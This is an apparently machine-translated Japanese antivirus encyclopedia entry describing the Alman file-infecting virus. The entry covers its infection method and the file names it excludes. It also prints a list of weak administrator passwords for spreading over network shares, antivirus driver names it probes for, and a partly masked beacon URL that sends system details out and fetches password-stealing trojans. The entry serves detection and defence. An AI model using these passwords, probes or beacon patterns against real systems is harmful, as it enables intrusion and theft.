Virus.Win32.Alman

このウイルスは、被害者のコンピュータ上のすべてのディスクおよびアクセス可能なネットワークフォルダに、書き込み可能なすべてのWindows実行可能ファイル（PE-EXE）を感染させます。このウイルスは、以下の名前のファイルには感染しません。

 wooolcfg.exewoool.exeztconfig.exepatchupdate.exetrojankiller.exexy2player.exeflyff.exexy2.exeau_unins_web.execabal.execabalmain9x.execabalmain.exemeteor.exepatcher.exemjonline.execonfig.exezuonline.exeuserpic.exemain.exedk2.exeautoupdate.exedbfsupdate.exeasktao.exesealspeed.exexlqy2.exegame.exewb-service.exenbt-dragonraja2006.exedragonraja.exemhclient-connect.exehs.exemts.exegc.exezfs.exeneuz.exemaplestory.exensstarter.exenmcosrv.execa.exenmservice.exekartrider.exeaudition.exezhengtu.exe 

ウイルスは、その実行可能ファイルを感染しているファイルの先頭に書き込んで、ファイルの元の内容を下に移動します。

ウイルスは、ネットワークフォルダにあるファイルに感染するために、管理者アカウントと次のいずれかのパスワードを使用してリモートマシンに接続しようとします。

 zxcvqazwsxqazqwer！@＃$％^＆*（）！@＃$％^＆*（！@＃$％^＆*！@＃$％^＆！@＃$％^！@＃$％aasdf sdfgh！@＃$654321123456123451234123111 

このウイルスは、リモートの悪意のあるユーザーのサイトに、Cディスク上の空き容量、犠牲PC上のオペレーティングシステムとInternet Explorerのバージョン、およびリストされた名前のうちの1つを持つシステム内のドライバの存在に関する情報も送信します以下：

 HooksysKWatch3KregExKLPFNaiAvFilter1NAVAPAVGNTMGRAvgTdinod32drvPavProtectTMFilterBDFsDrvVETFDDNT 

この情報は、リモートの悪意のあるユーザーのサイトに次の要求で送信されます。

 http：//****mrw0rldwide.com/co.asp？action = post＆HD = <空き容量>＆OT = <オペレーティングシステムのバージョン>＆IV = <Internet Explorerのバージョン>＆AV = <インストールされたドライバ> 

ウイルスは、以下のリンクからダウンロードされるファイルのリストも取得します。

その後、リストからファイルをダウンロードし、Windowsの一時ディレクトリに保存して実行用に起動します。

執筆時点で、ウイルスは次のリンクからファイルをダウンロードしました：

 http：//down****net/css.jpghttp：//down****net/wow.jpg 

次のように保存しました。

％Temp％css.jpg – このファイルのサイズは62 792バイトです。 Kaspersky Anti-Virusでは、Trojan-PSW.Win32.OnLineGames.afdとして検出されます。

％Temp％wow.jpg – このファイルのサイズは40 241バイトです。 Kaspersky Anti-VirusによってTrojan-PSW.Win32.WOW.svとして検出されます。